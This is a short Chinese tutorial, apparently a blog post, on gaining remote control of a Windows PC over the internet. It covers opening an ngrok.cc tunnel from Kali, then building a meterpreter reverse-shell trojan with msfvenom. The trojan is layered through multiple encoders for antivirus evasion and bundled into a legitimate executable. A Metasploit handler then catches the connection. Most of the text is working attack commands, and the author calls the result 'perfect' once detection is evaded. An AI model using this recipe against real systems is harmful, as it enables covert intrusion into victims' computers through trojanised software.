安装配置环境

网址

https://www.ngrok.cc

        支付两块钱之后，就可以免费使用服务器，进行隧道开通。远程端口就是服务器的端口，可以先随便写，等下会提示有哪一些可用端口

 

 下载客户端，选择64位的版本（跟kali一样）

https://www.ngrok.cc/download.html

将下载完成的文件解压复制到kali中

操作

①运行隧道

./sunny clientid 隧道id
#在隧道管理中可以进行查看

如果是红色的就说明了连接出现了问题，绿色表示连接正常

②用msf生成木马，ip地址和端口都是写公网的ip地址

可以现在自己的cmd上ping一下域名得到ip

ping free.idcfengye.com

木马生成

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=公网地址 LPORT=公网端口 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai  -i 5 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x /mnt/d/geek/geek.exe -k -f exe > /mnt/c/Users/Administrator/Desktop/gk.exe
#多重编码、自编码加捆绑生成马

③开启监听，监听的地址为kali的ip地址和端口

handler -H 192.168.78.29 -P 1111 -p windows/meterpreter/reverse_tcp 

结果总结：

        ①本次实验网络配置：kali主机和另外一台pc连接的是两把手机的热点。

        ②测试结果是可以监听的到的，可以跨外网，只要把免杀做好就是完美的。